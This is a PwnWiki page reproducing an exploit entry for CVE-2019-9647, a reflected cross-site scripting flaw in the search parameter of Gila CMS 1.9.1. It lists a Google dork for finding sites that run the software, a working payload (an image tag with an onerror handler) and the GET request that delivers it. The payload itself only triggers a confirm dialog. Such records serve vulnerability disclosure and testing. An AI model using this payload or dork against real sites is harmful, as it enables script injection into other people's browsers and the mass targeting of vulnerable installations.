CVE-2019-9647 Gila CMS 1.9.1 XSS漏洞

From PwnWiki
Revision as of 13:01, 2 May 2021 by Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Gila CMS (search) Cross Site Scripting # Google Dork: intext:"Powered By Gila CMS" # Date: 11.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Ven...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

XSS

# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Date: 11.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647

# Vulnerable Parameter: search

# Payload: <--`<img/src=` onerror=confirm``> --!>

# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2019-9647_Gila_CMS_1.9.1_XSS漏洞&oldid=2036"